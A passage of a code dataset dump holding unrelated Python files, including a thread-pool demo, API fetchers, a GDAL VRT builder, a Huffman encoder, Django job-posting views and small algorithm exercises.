seg.even_odd(arr)\n        self.verify(result)\n","sub_path":"tests/online/geeks/test_even_odd.py","file_name":"test_even_odd.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
{"seq_id":"477250273","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport threading\nimport time\nimport queue\n\nclass myThread (threading.Thread): # inherits from the parent class threading.Thread\n    def __init__(self, threadID, name, queue):\n        threading.Thread.__init__(self)\n        self.threadID = threadID\n        self.name = name\n        self.queue = queue\n    def run(self): # put the code to execute inside run(); the thread runs run() right after it is started\n        print(\"Starting \" + self.name)\n        while True:\n            item = q.get()\n            print(self.name + \"get \" + str(item))\n            q.task_done()\n        print(\"Exiting \" + self.name)\n\nq = queue.Queue()\n\n# create the thread pool\nfor i in range(10):\n    t = myThread(1, \"Thread-%s\"%i, q)\n    t.daemon = True\n    t.start()\n\nfor item in range(1000):\n    q.put(item)\nq.join()\nprint(\"Exiting Main 
Thread\")\n","sub_path":"basic/languages/python-19910220/lib-ref/17-cocurrent-execution/threadpool.py","file_name":"threadpool.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"424026124","text":"import sys\nimport requests\n\ndeps=list(map(lambda x:\"{:02}\".format(x),range(1,96)))\ndeps[19:20]=[\"2A\",\"2B\"]\nfirst=True\nfor dep in deps:\n print(dep,file=sys.stderr)\n params={'num_departement':dep,'size':'20000'}\n res=requests.get(\"http://hubeau.eaufrance.fr/api/v1/qualite_nappes/stations.csv\",params=params)\n if res.status_code==requests.codes.ok:\n if first:\n print(res.text,end='')\n first=False\n else:\n content=res.text\n print(content[content.find('\\n')+1:],end='')\n else:\n print('Erreur {} dans \"{}\"'.format(res.status_code,res.url),file=sys.stderr)\n","sub_path":"get_ades_bss.py","file_name":"get_ades_bss.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"166078685","text":"import os\nimport argparse\n\n\ndef get_integration_years():\n\n years = range(2010, 2018)\n\n return years\n\ndef vrt_integration(pathInput, pathOutput):\n\n integrationYears = get_integration_years()\n\n bands = range(0,len(integrationYears))\n\n for band in bands:\n\n pathImageInput = pathInput + '/*.tif'\n pathImageOutput = pathOutput + \"/INTEGRACAO_\" + str(integrationYears[band]) + '.vrt'\n\n osCommand = 'gdalbuildvrt -b ' + str(band + 1) + \" \" + \\\n pathImageOutput + \" \" + pathImageInput\n\n print(osCommand)\n os.system(osCommand)\n\ndef get_transition_years():\n transition_years = [ u'1985_1986', u'1986_1987', u'1987_1988', u'1988_1989', u'1989_1990', u'1990_1991',\n u'1991_1992', u'1992_1993', u'1993_1994', u'1994_1995', u'1995_1996', u'1996_1997', \n u'1997_1998', u'1998_1999', u'1999_2000', u'2000_2001', u'2001_2002', u'2002_2003', \n u'2003_2004', u'2004_2005', u'2005_2006', u'2006_2007', u'2007_2008', u'2008_2009', \n u'2009_2010', u'2010_2011', u'2011_2012', u'2012_2013', u'2013_2014', u'2014_2015', \n u'2015_2016', u'2016_2017', u'1985_1990', u'1990_1995', u'1995_2000', u'2000_2005', \n u'2005_2010', u'2010_2015', u'2015_2017', u'1990_2000', u'2000_2010', u'2010_2017', \n u'1985_2017', u'2008_2017', u'2012_2017', u'1994_2002', u'2002_2010', u'2010_2016']\n\n return transition_years\n\ndef vrt_transition(pathInput, pathOutput):\n\n transitionYears = get_transition_years()\n\n bands = range(0, len(get_transition_years()))\n\n for band in bands:\n\n pathImageInput = pathInput + '/*.tif'\n pathImageOutput = pathOutput + \"/TRANSICAO_\" + str(transitionYears[band]) + '.vrt'\n\n osCommand = 'gdalbuildvrt -b ' + str(band + 1) + \" \" + \\\n pathImageOutput + \" \" + pathImageInput\n\n print(osCommand)\n os.system(osCommand)\n\n\ndef vrt_rgb(pathInput, pathOutput):\n\n integrationYears = get_integration_years()\n\n bands = range(0,33)\n\n for band in bands:\n year = str(integrationYears[band])\n pathImageInput = pathInput + '/mosaic-rgb-collection3-' + year + '*.tif'\n pathImageOutput = pathOutput + \"/RGB_\" + str(integrationYears[band]) + '.vrt'\n\n osCommand = 'gdalbuildvrt -allow_projection_difference -overwrite ' + \\\n pathImageOutput + \" \" + pathImageInput\n\n print(osCommand)\n os.system(osCommand)\n\n\n\ndef interface():\n\n parser = argparse.ArgumentParser(description='Create VRT')\n\n parser.add_argument('colecao', type=str, default='integracao', help='choose which collection', \n 
choices=['integracao', 'transicao', 'rgb'])\n\n    parser.add_argument('dir_src', type=str, help='the source folder')\n\n    parser.add_argument('dir_dst', type=str, help='the destination folder')\n    \n    colecao = parser.parse_args().colecao\n    dir_src = parser.parse_args().dir_src\n    dir_dst = parser.parse_args().dir_dst\n\n    if colecao == \"integracao\":\n        vrt_integration(dir_src, dir_dst)\n\n    if colecao == 'transicao':\n        vrt_transition(dir_src, dir_dst)\n\n    if colecao == 'rgb':\n        vrt_rgb(dir_src, dir_dst)\n\n\nif __name__ == \"__main__\":\n    interface()\n\n","sub_path":"images/buildvrt_util.py","file_name":"buildvrt_util.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"417178459","text":"class Node:\n    def __init__(self,symbol, weight, left = None, right = None):\n        self.symbol = symbol\n        self.left = left\n        self.right = right\n        self.weight = weight\n    def children(self):\n        return (self.left, self.right)\n    def __str__(self):\n        return '%s_%s' % (self.left, self.right)\n\n    \n    def preorder_traversal(self, path = '', codes = None): #depth traversal, preorder traversal\n        # use a fresh dict per call (a shared mutable default would leak codes between calls)\n        if codes is None:\n            codes = {}\n        if self.left == None:\n            codes[self.symbol] = path\n        else:\n            self.left.preorder_traversal(path+'0', codes)\n            self.right.preorder_traversal(path + '1', codes)\n        return codes\n\ndef sort_by_weight(node: Node):\n    return (node.weight * 10000000 + ord(node.symbol[0]))\n\n\nclass huffman:\n    def __init__(self, tree = None, source = None):\n        pass\n    def gen_tree(self, source):\n        freq = self.get_freq(source)\n        print(freq)\n        tree = [] # list of nodes with weight = freq\n        for sym in freq.keys():\n            tree.append(Node(sym, freq[sym]))\n        tree.sort(key = sort_by_weight)\n        while len(tree)>1:\n            l = tree.pop(0)\n            r = tree.pop(0)\n            new_node = Node(l.symbol + r.symbol,l.weight + r.weight, l,r)\n            tree.append(new_node)\n            tree.sort(key = sort_by_weight)            \n        return tree\n\n    def encode(self, source , tree = None):\n        if not tree:\n            self.tree = self.gen_tree(source)\n        else:\n            self.tree = tree\n        self.codes = self.tree[0].preorder_traversal()\n        print(self.codes)\n        encoded = ''\n        for sym in source:\n            encoded += self.codes[sym]\n        return encoded\n    def get_freq(self,string):\n        #creates a dictionary with key being each symbol and value the freq\n        symbols = {}\n        for sym in string:\n            symbols[sym] = symbols.get(sym,0)+1\n        return symbols\n\nh = huffman().encode(\"lossless compression\")\nprint(h)\n","sub_path":"data_compression/huffman_py/huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"542265581","text":"import requests\n# developer_key for google api\nApi_Key = \"**********\"\n\n\"\"\"\n    Description:\n        Search and return the list of videos by specified key.\n    Parameters:\n        - key           title of the video you want\n        - max_result    max number of result returned every time\n        - order         \n            https://developers.google.com/apis-explorer/#p/youtube/v3/youtube.search.list\n            - date\n            - rating\n            - relevance\n            - title\n            - videoCount\n            - viewCount\n\"\"\"\ndef searchVideosByKey(key, max_result = 25,order = \"relevance\",page_token = \"\"):\n    logUrl = 'https://www.googleapis.com/youtube/v3/search'\n    parms = {\n        \"part\": \"snippet\",\n        \"maxResult\": max_result,\n        \"q\":key,\n        \"key\": Api_Key,\n        \"order\": order\n    }\n    if page_token != \"\":\n        parms[\"pageToken\"] = page_token\n    re = requests.get(logUrl, parms)\n    return re\n\n\"\"\"\n    Description:\n        Get the list of comment 
threads in a video. Each thread contains a top comment and 0 or more replies.\n        Note: this function just returns the top comments.\n    Parameters:\n        - video_id      the id of the video, you can find it in the url address or search the video by using function searchVideosByKey()\n\"\"\"\ndef commentThreads(video_id):\n    logUrl = 'https://www.googleapis.com/youtube/v3/commentThreads'\n    parms = {\n        \"part\":\"snippet\",\n        \"videoId\": video_id,\n        \"key\":Api_Key\n    }\n    re = requests.get(logUrl,parms)\n    return re\n\n\"\"\"\n    Description:\n        Get the statistics of the specified video:\n        - viewCount\n        - likeCount\n        - dislikeCount\n        - favoriteCount\n        - commentCount\n    Parameters:\n        - id            the id of the video, you can find it in the url address or search the video by using function searchVideosByKey()\n\"\"\"\ndef videoStatistics(video_id):\n    logUrl = 'https://www.googleapis.com/youtube/v3/videos'\n    parms = {\n        \"part\": \"statistics\",\n        \"id\": video_id,\n        \"key\": Api_Key\n    }\n    re = requests.get(logUrl, parms)\n    return re\n\n# test stub\nif __name__ == '__main__':\n    print()\n    # result1 = searchVideosByKey(\"Syracuse University\")\n    # print(result1.text)\n    # result2 = commentThreads(\"6XFOou8Uq6c\")\n    # print(result2.text)\n    result3 = videoStatistics(\"LUlNcT9v3no\")\n    print(result3.text)\n","sub_path":"youtubeApi.py","file_name":"youtubeApi.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"568557448","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 15 08:31:37 2021\r\n\r\n@author: oislen\r\n\"\"\"\r\n\r\n\r\ndef extract_model_cols(dataset):\r\n    \"\"\"\r\n\r\n    Extract Model Columns Documentation\r\n\r\n    Function Overview\r\n\r\n    This function splits up the columns of a given modeling dataset into index columns, target columns, excluded columns and predictor columns.\r\n    The results are returned as arrays within a Python dictionary.\r\n\r\n    Defaults\r\n\r\n    extract_model_cols(dataset)\r\n\r\n    Parameters\r\n\r\n    dataset - DataFrame, the modelling dataset to extract the various columns from.\r\n\r\n    Returns\r\n\r\n    model_cols_dict - Dictionary, the extracted columns stored within arrays\r\n\r\n    Example\r\n\r\n    extract_model_cols(dataset = base)\r\n\r\n    \"\"\"\r\n\r\n    print('extracting out dataset columns ...')\r\n\r\n    # extract the dataset columns\r\n    data_cols = dataset.columns.tolist()\r\n\r\n    # separate out the index, target and predictor columns\r\n    index_cols = ['primary_key',\r\n                  'ID',\r\n                  'data_split',\r\n                  'meta_level',\r\n                  'holdout_subset_ind',\r\n                  'no_sales_hist_ind',\r\n                  'no_holdout_sales_hist_ind',\r\n                  'year',\r\n                  'month',\r\n                  'date_block_num',\r\n                  'shop_id',\r\n                  'item_id',\r\n                  'item_cat_id',\r\n                  'item_category_id',\r\n                  'item_cat_sub_id'\r\n                  ]\r\n\r\n    tar_cols = ['item_cnt_day']\r\n\r\n    # the columns below contain information which would forward bias the results (data leakage from target)\r\n    forward_bias_cols = ['shop_id_total_item_cnt_day',\r\n                         'item_id_total_item_cnt_day',\r\n                         'item_category_id_total_item_cnt_day',\r\n                         'shop_id_item_category_id_total_item_cnt_day',\r\n                         'city_enc_total_item_cnt_day',\r\n                         'item_id_city_enc_total_item_cnt_day'\r\n                         ]\r\n\r\n    # the columns below don't add much intrinsic value\r\n    useless_cols = ['year_mean_enc',\r\n                    'month_mean_enc',\r\n                    'date_block_num_mean_enc',\r\n                    'days_of_month',\r\n                    'city_enc'\r\n                    ]\r\n\r\n    # combine all columns to ignore\r\n    excl_cols = index_cols + tar_cols + forward_bias_cols + useless_cols\r\n\r\n    # extract the predictor columns which 
are not an element of index, target or exlusion columns\r\n pred_cols = [col for col in data_cols if col not in excl_cols]\r\n\r\n # create a dictionary of the output columns\r\n model_cols_dict = {'index_cols': index_cols,\r\n 'tar_cols': tar_cols,\r\n 'excl_cols': excl_cols,\r\n 'pred_cols': pred_cols\r\n }\r\n\r\n return model_cols_dict\r\n","sub_path":"competitions/Predict_Future_Sales/scripts/02_prg_run_meta_level_I/reference/extract_model_cols.py","file_name":"extract_model_cols.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"577820467","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .forms import FormularioAnuncio, FormularioModificarAnuncio, FormularioPersona, FormularioModificarPersona, FormularioPostulacion,FormularioModificarPostulacion\nfrom apps.modelo.models import Persona, Anuncio, Postulacion\nfrom django.contrib import messages\n\n\n@login_required\ndef principal(request):\n\tusuario = request.user #Petición que es procesada por el framework y obtiene el usuario \n\treturn render(request,'pagina_principal_sesion_iniciada.html')\n\ndef registrar_persona(request):\n\tformulario = FormularioPersona(request.POST)\n\tif request.method == 'POST':\n\t\tif formulario.is_valid():\n\t\t\t#Persona\n\t\t\tdatos=formulario.cleaned_data #Obtener todos los datos del formulario\n\t\t\tpersona=Persona() #Crea un objeto de la case Persona\n\t\t\tpersona.nombres=datos.get('nombres')\n\t\t\tpersona.apellidos=datos.get('apellidos')\n\t\t\tpersona.fecha_nacimiento=datos.get('fecha_nacimiento')\n\t\t\tpersona.correo=datos.get('correo')\n\t\t\tpersona.celular=datos.get('celular')\n\t\t\tpersona.save()\n\t\t\tmensaje = 'Se ha registrado correctamente'\n\t\t\tcolor = 'success'\n\t\t\tmensaje_adicional='Porfavor inicie sesión'\n\t\t\tcontext = {\n\t\t\t\t'mensaje': mensaje,\n\t\t\t\t'color': color,\n\t\t\t\t'mensaje_adicional': mensaje_adicional,\n\t\t\t}\n\t\t\treturn render (request, 'status.html',context)\n\tcontext = {\n\t\t'formulario': formulario\n\t}\n\treturn render(request, 'persona/registrar_persona.html', context)\n\n@login_required\ndef mostrar_anuncios(request):\n\tusuario = request.user #Petición que es procesada por el framework y obtiene el usuario \n\tif usuario!='null':\n\t\tlista=Anuncio.objects.all()\n\t\tcontext={\n\t\t\t'lista': lista,\n\t\t}\n\t\treturn render(request,'anuncio/anuncios.html', context)\n\telse:\n\t\tmensaje = 'No ha iniciado sesión aún'\n\t\tcolor = 'danger'\n\t\tmensaje_adicional='Porfavor inicie sesión'\n\t\tcontext = {\n\t\t\t'mensaje': mensaje,\n\t\t\t'color': color,\n\t\t\t'mensaje_adicional': mensaje_adicional,\n\t\t}\n\t\treturn render(request,'status.html', context)\n\n@login_required\ndef ver_postulaciones(request):\n\tusuario = request.user\n\tif usuario!='null':\n\t\tcodigo = request.GET['codigo']\n\t\tanuncio=Anuncio.objects.get(anuncio_id=codigo)\n\t\tlista = Postulacion.objects.filter(anuncio_id = codigo)\n\t\tcontext={\n\t\t\t'lista': lista,\n\t\t\t'anuncio': anuncio.titulo,\n\t\t}\n\t\treturn render(request,'postulacion/postulaciones.html', context)\n\telse:\n\t\tmensaje = 'No ha iniciado sesión aún'\n\t\tcolor = 'danger'\n\t\tmensaje_adicional='Porfavor inicie sesión'\n\t\tcontext = {\n\t\t\t'mensaje': mensaje,\n\t\t\t'color': color,\n\t\t\t'mensaje_adicional': mensaje_adicional,\n\t\t}\n\t\treturn render(request,'status.html', context)\t\t\n\n@login_required\ndef 
buscar_anuncios(request):\n\tusuario = request.user\n\tif usuario!='null':\n\t\tconsulta = request.GET['consulta']\n\t\tlista=Anuncio.objects.filter(titulo__contains=consulta).order_by('titulo')\t\n\t\tif not lista:\n\t\t\tcontext={\n\t\t\t\t'mensaje': 'Lo sentimos, aún no hay empleos disponibles para ese campo',\n\t\t\t\t'color':'danger',\n\t\t\t}\n\t\telse:\t\n\t\t\tcontext={\n\t\t\t\t'lista': lista\n\t\t\t}\n\t\treturn render(request,'anuncio/anuncios.html', context)\n\n@login_required\ndef crear_anuncio(request):\n\tusuario = request.user\n\tif usuario!='null':\n\t\tformulario = FormularioAnuncio(request.POST)\n\t\tcelu = request.GET['celular']\n\t\tpersona = Persona.objects.get(celular = celu)\n\t\tif request.method == 'POST':\n\t\t\tif formulario.is_valid():\n\t\t\t\t#Persona\n\t\t\t\tdatos=formulario.cleaned_data #Obtener todos los datos del formulario\n\t\t\t\tanuncio=Anuncio() #Crea un objeto de la clase Anuncio\n\t\t\t\tanuncio.titulo=datos.get('titulo')\n\t\t\t\tanuncio.puesto=datos.get('puesto')\n\t\t\t\tanuncio.descripcion=datos.get('descripcion')\n\t\t\t\tanuncio.area=datos.get('area')\n\t\t\t\tanuncio.pais='Ecuador'\n\t\t\t\tanuncio.provincia=datos.get('provincia')\n\t\t\t\tanuncio.ciudad=datos.get('ciudad')\n\t\t\t\tanuncio.direccion=datos.get('direccion')\n\t\t\t\tanuncio.persona=persona\n\t\t\t\tanuncio.save()\n\t\t\t\tmensaje = 'Se ha creado el anuncio correctamente'\n\t\t\t\tcontext = {\n\t\t\t\t'mensaje': mensaje\n\t\t\t\t}\n\t\t\t\treturn render (request, 'anuncio/status_anuncio.html',context)\n\t\tcontext = {\n\t\t\t'formulario': formulario\n\t\t}\n\t\treturn render(request, 'anuncio/crear_anuncio.html', context)\n\n\n@login_required\ndef modificar_anuncio(request):\n\tusuario = request.user\n\tif usuario!='null':\t\n\t\tanuncio_id = request.GET['id']\n\t\tanuncio = Anuncio.objects.get(anuncio_id = anuncio_id)\n\t\tif request.method == 'POST':\n\t\t\tformulario=FormularioModificarAnuncio(request.POST)\n\t\t\tif formulario.is_valid():\n\t\t\t\tdatos=formulario.cleaned_data\n\t\t\t\tanuncio.titulo=datos.get('titulo')\n\t\t\t\tanuncio.puesto=datos.get('puesto')\n\t\t\t\tanuncio.descripcion=datos.get('descripcion')\n\t\t\t\tanuncio.area=datos.get('area')\n\t\t\t\tanuncio.pais='Ecuador'\n\t\t\t\tanuncio.provincia=datos.get('provincia')\n\t\t\t\tanuncio.ciudad=datos.get('ciudad')\n\t\t\t\tanuncio.direccion=datos.get('direccion')\n\t\t\t\tanuncio.save()\n\t\t\t\tmensaje = 'Se ha modificado el anuncio correctamente'\n\t\t\t\tcontext = {\n\t\t\t\t'mensaje': mensaje\n\t\t\t\t}\n\t\t\t\treturn render (request, 'anuncio/status_anuncio.html',context)\n\t\telse:\n\t\t\tformulario=FormularioModificarAnuncio(instance = anuncio)\n\t\t\tcontext = {\n\t\t\t\t'anuncio': anuncio,\n\t\t\t\t'formulario': formulario,\n\t\t\t}\n\t\t\treturn render(request, 'anuncio/modificar_anuncio.html', context)\t\t\n\n\n@login_required\ndef eliminar_anuncio(request):\n\tusuario = request.user\n\tif usuario!='null':\t\n\t\tformulario = FormularioAnuncio(request.POST)\n\t\tanuncio_id = request.GET['id']\n\t\tanuncio = Anuncio.objects.get(anuncio_id = anuncio_id)\n\t\tanuncio.delete()\n\t\tmensaje = 'Se ha eliminado el anuncio correctamente'\n\t\tcontext = {\n\t\t'mensaje': mensaje\n\t\t}\n\t\treturn render (request, 'anuncio/status_anuncio.html',context)\n\n\n@login_required\ndef postular(request):\n\tusuario = request.user\n\tif usuario!='null':\t\n\t\tformulario = FormularioPostulacion(request.POST)\n\t\tcelu = request.GET['celular']\n\t\tpersona = Persona.objects.get(celular = celu)\n\t\tif 
request.method == 'POST':\n\t\t\tid_a=request.GET['id']\n\t\t\tanuncio = Anuncio.objects.get(anuncio_id=id_a)\n\t\t\tif formulario.is_valid():\n\t\t\t\t#Persona\n\t\t\t\tdatos=formulario.cleaned_data #Obtener todos los datos del formulario\n\t\t\t\tpostulacion=Postulacion() #Crea un objeto de la case Persona\n\t\t\t\tpostulacion.salario=datos.get('salario')\n\t\t\t\tpostulacion.mensaje=datos.get('mensaje')\n\t\t\t\tpostulacion.persona=persona\n\t\t\t\tpostulacion.anuncio=anuncio\n\t\t\t\tpostulacion.save()\n\t\t\t\tmensaje = 'Se ha postulado correctamente'\n\t\t\t\tcontext = {\n\t\t\t\t'mensaje': mensaje\n\t\t\t\t}\n\t\t\t\treturn render (request, 'anuncio/status_anuncio.html',context)\n\t\tcontext = {\n\t\t\t'formulario': formulario\n\t\t}\n\t\treturn render(request, 'postulacion/postular.html', context)","sub_path":"apps/persona/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"588456139","text":"###########################################################################\r\n# Description: This is the exercises of chapter 5 in Investment Sciense.\r\n# Author: Yeda Cui\r\n\r\ndef AddDim(lst, addlst):\r\n donelst = []\r\n if len(lst) is 0:\r\n for i in addlst:\r\n donelst.append([i])\r\n else:\r\n for i in lst:\r\n for j in addlst:\r\n donelst.append(i + [j])\r\n return donelst\r\n\r\n\r\n# Exercise 2\r\n\r\nnet_return = [4, 5, 3, 4.3, 1, 1.5, 2.5, 0.3, 1, 2]\r\noutlay = [2, 3, 1.5, 2.2, 0.5, 1.5, 2.5, 0.1, 0.6, 1]\r\n\r\n\r\ndef OptimalInvest(n, net_return, outlay):\r\n # While using the function, you may set the condition by yourself!\r\n\r\n class INVEST:\r\n number = 0\r\n net_return = 0\r\n outlay = 0\r\n\r\n def __init__(self, invest):\r\n self.invest = invest\r\n INVEST.number += 1\r\n\r\n def GetReturn(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.net_return[self.invest[i]]\r\n return sum\r\n\r\n def GetOutlay(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.outlay[self.invest[i]]\r\n return sum\r\n\r\n def GetCondition(self):\r\n if (self.invest[0] in [1, 3]) and (self.invest[1] == 4):\r\n return False\r\n else:\r\n if self.GetOutlay() > 5:\r\n return False\r\n else:\r\n return True\r\n\r\n INVEST.net_return = net_return\r\n INVEST.outlay = outlay\r\n\r\n Invest_List = []\r\n for i in range(len(n)):\r\n addlst = list(range(sum(n[0:i]), sum(n[0:i + 1])))\r\n Invest_List = AddDim(Invest_List, addlst)\r\n\r\n invests = []\r\n for i in Invest_List:\r\n invests.append(INVEST(i))\r\n\r\n Invest_List = invests\r\n\r\n return_list = []\r\n Invest_Avialbe = []\r\n for i in range(len(Invest_List)):\r\n if Invest_List[i].GetCondition():\r\n return_list.append(Invest_List[i].GetReturn())\r\n Invest_Avialbe.append(Invest_List[i])\r\n\r\n return ([Invest_Avialbe[return_list.index(max(return_list))].invest,\r\n Invest_Avialbe[return_list.index(max(return_list))].GetReturn(),\r\n Invest_Avialbe[return_list.index(max(return_list))].GetOutlay()])\r\n\r\n\r\n# exercise 3\r\n\r\nnet_return = [150, 200, 100, 100, 120, 150, 240]\r\noutlay1 = [90, 80, 50, 20, 40, 80, 80]\r\noutlay2 = [58, 80, 100, 64, 50, 20, 100]\r\n\r\ndef OptimalInvest(n, net_return, outlay1, outlay2):\r\n# While using the function, you may set the condition by yourself!\r\n\r\n class INVEST:\r\n number = 0\r\n net_return = 0\r\n outlay1 = 0\r\n outlay2 = 0\r\n\r\n def __init__(self, invest):\r\n 
self.invest = invest\r\n INVEST.number += 1\r\n\r\n def GetReturn(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.net_return[i]*self.invest[i]\r\n return sum\r\n\r\n def GetOutlay1(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.outlay1[i]*self.invest[i]\r\n return sum\r\n\r\n def GetOutlay2(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.outlay2[i]*self.invest[i]\r\n return sum\r\n\r\n def GetCondition(self):\r\n if self.GetOutlay1() <= 250 and self.GetOutlay2() <= (250 - self.GetOutlay1())*1.1 + 250 :\r\n return True\r\n else:\r\n return False\r\n\r\n INVEST.net_return = net_return\r\n INVEST.outlay1 = outlay1\r\n INVEST.outlay2 = outlay2\r\n\r\n Invest_List = []\r\n for i in range(len(n)):\r\n Invest_List = AddDim(Invest_List, list(range(n[i])))\r\n\r\n invests = []\r\n for i in Invest_List:\r\n invests.append(INVEST(i))\r\n\r\n Invest_List = invests\r\n\r\n return_list = []\r\n Invest_Avialbe = []\r\n for i in range(len(Invest_List)):\r\n if Invest_List[i].GetCondition():\r\n return_list.append(Invest_List[i].GetReturn())\r\n Invest_Avialbe.append(Invest_List[i])\r\n\r\n return ([Invest_Avialbe[return_list.index(max(return_list))].invest,\r\n Invest_Avialbe[return_list.index(max(return_list))].GetReturn(),\r\n Invest_Avialbe[return_list.index(max(return_list))].GetOutlay1(),\r\n Invest_Avialbe[return_list.index(max(return_list))].GetOutlay2()])\r\n\r\n\r\n\r\n","sub_path":"Exercise_Chapter 5.py","file_name":"Exercise_Chapter 5.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"197890535","text":"import json\nfrom collections import defaultdict\n#from flask import Flask, request\nfrom pytrie import Trie\nimport uuid\nimport requests\n\n#app = Flask(__name__)\n\nuniversity_data = list()\nuniversity_country_index = defaultdict(list)\nuniversity_domain_index = defaultdict(list)\nuniversity_name_index = dict()\n\n\ndef search(domain='',country='',name=''):\n if not uni_data_loaded:\n load_data()\n\n #country = request.args.get('country')\n #name = request.args.get('name')\n #domain = request.args.get('domain')\n filtered = university_data\n\n if name and country:\n name = name.lower()\n country = country.lower()\n name_filtered = prefix_tree.values(prefix=name)\n country_filtered = university_country_index[country]\n filtered = [i for i in name_filtered if i['name'] in [_i['name'] for _i in country_filtered]]\n\n elif domain:\n domain = domain.lower()\n filtered = university_domain_index[domain]\n\n elif name:\n name = name.lower()\n filtered = prefix_tree.values(prefix=name)\n elif country:\n country = country.lower()\n filtered = university_country_index[country]\n\n return len(filtered)\n\nuni_data_loaded = False\n\n\ndef load_data():\n [print('Loading uni data') for i in range(10)]\n global uni_data_loaded, prefix_tree, university_data, university_country_index, university_name_index, university_domain_index\n response = requests.get(\"https://raw.githubusercontent.com/Hipo/university-domains-list/master/world_universities_and_domains.json\")\n university_data = response.json()\n for i in university_data:\n #university_country_index[i[\"country\"].lower()].append(i)\n [university_domain_index[j.lower()].append(i) for j in i[\"domains\"]]\n #university_name_index[i['name'].lower()] = i\n '''\n splitted = i['name'].split(\" \")\n if 
len(splitted) > 1:\n for splitted_name in splitted[1:]:\n university_name_index[splitted_name.lower() + str(uuid.uuid1())] = i\n '''\n #prefix_tree = Trie(**university_name_index)\n\n uni_data_loaded = True\n\n'''\n@app.route('/')\ndef index():\n\n if not data_loaded:\n load_data()\n\n data = {'author': {'name': 'hipo', 'website': 'http://hipolabs.com'},\n 'example': 'http://universities.hipolabs.com/search?name=middle&country=Turkey',\n 'github': 'https://github.com/Hipo/university-domains-list'}\n return json.dumps(data)\n\nif __name__ == \"__main__\":\n app.run(debug=False)\n'''","sub_path":"memprot_project/uni_app.py","file_name":"uni_app.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"440092642","text":"'''\nCreated on Apr 9, 2016\n\n@author: joep\n'''\nimport os\n\nds_type = 'large'\nBASE = os.path.dirname(os.path.realpath(__file__))\n\ninf = open(os.path.join(BASE, 'A-large.in'.format(ds_type)), 'r')\noutf = open(os.path.join(BASE, '{}.out'.format(ds_type)), 'w+')\n\ncases = int(inf.readline())\n\nfor case in range(cases):\n n = int(inf.readline())\n \n if n == 0:\n c_n = 'INSOMNIA'\n \n else:\n i = 1\n digs = set()\n while True:\n c_n = str(i * n)\n digs.update(set(c_n))\n \n done = True\n for dig in '0123456789':\n if dig not in digs:\n done = False\n break\n \n if done:\n break\n \n i += 1\n \n outf.write('Case #{}: {}\\n'.format(case + 1, c_n))\n print('Finished {}'.format(case + 1))\n \n","sub_path":"codes/CodeJamCrawler/16_0_1/Smetterleen/qual1.py","file_name":"qual1.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"20402279","text":"n = int(input())\r\ndef fibo(x):\r\n a, b = 1, 1\r\n if x == 1 or x == 2:\r\n return a\r\n while x > 1:\r\n a, b = b, (a + b) % 10007\r\n x -= 1\r\n return a\r\nprint(fibo(n))","sub_path":"蓝桥杯/begin_4.py","file_name":"begin_4.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"286928993","text":"from lib.data_analysis.algorithms.texts.lda import LDA\nfrom lib.data_analysis.texts.stop_words import StopWords\nfrom lib.data_analysis.texts.corpus import Corpus\nimport pandas as pd\n\nsw = StopWords(\"/home/sokolov/PycharmProjects/t/DataAnalysis/lib/data_analysis/texts/stopwords.dic\")\nsw.load_stop_words_from_file()\nsw.load_stop_word_from_nltk_lib()\n\ndata = pd.read_csv(\"/home/sokolov/PycharmProjects/t/DataAnalysis/LWs/LW_11/data/lenta_ru.csv\")\ndocuments = data[\"text\"].tolist()\n\ncorpus = Corpus()\ncorpus.load_corpus_from_list(documents)\n\nlda = LDA(corpus=corpus, stop_words=sw, K=20, alpha=0.5, beta=0.5, iterations=50)\nlda.run()\nprint(\"\\n\", lda.worddist())\n","sub_path":"LWs/LW_11/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"87430031","text":"import os\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ModelProject.settings')\nfrom django import setup\nsetup()\n\nfrom ModelApp.models import Person\n\npersons = Person.objects.all()\n\nfor person in persons:\n print(person.id, person, person.salary)\n\n# person = Person.objects.get(first_name='Taro')\nperson = Person.objects.get(pk=1)\nprint(person.id, 